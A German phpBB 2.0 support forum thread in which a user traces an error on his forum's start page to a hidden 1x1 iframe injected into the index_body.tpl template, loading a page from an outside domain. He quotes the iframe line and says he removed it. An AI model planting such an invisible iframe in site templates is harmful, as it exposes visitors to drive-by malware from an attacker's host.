Hilfe: Bekomme seit neustem eine dumme Fehlermeldung

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
CarstenS
Mitglied

Hilfe: Bekomme seit neustem eine dumme Fehlermeldung

Beitrag von CarstenS »

Hallo und Hiiiiiilfe,
letzte Woche hatte ich endlich die Version 2.0.18. Nun taucht seit heute beim Aufrufen der Forums-Startseite Folgendes auf.

Habe heute die neue Version eingespielt. Der Fehler bleibt aber. Könnt ihr mir helfen??

Liebe Grüße und ein gutes Neues Jahr,

Carsten!
CarstenS
Mitglied

Beitrag von CarstenS »

So, habe nun den Fehler gefunden. In der index_body.tpl hatte sich zu Beginn folgender Code eingeschlichen:
<iframe width=1 height=1 border=0 frameborder=0 src="http://armono.com/ban11/index.php"></iframe>
Ich habe allerdings keine Ahnung, wie das dorthin gekommen ist. Ich habe meinen Hostanbieter jedenfalls mal gebeten, einen Check zu machen. Merkwürdig auch, dass es beim Uprade auf die 19er Version nicht verschwunden ist, obwohl die Dateien ja eigentlich überschrieben werden... Nach dem Löschen dieses Teils ist nun alles in Ordnung. - Hoffe, dass wirklich ALLES in Ordnung ist.

Ich mache mir aber schon so meine Gedanken, wer da eventuell in meinem Serverbereich rumfummeln kann. :-?
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“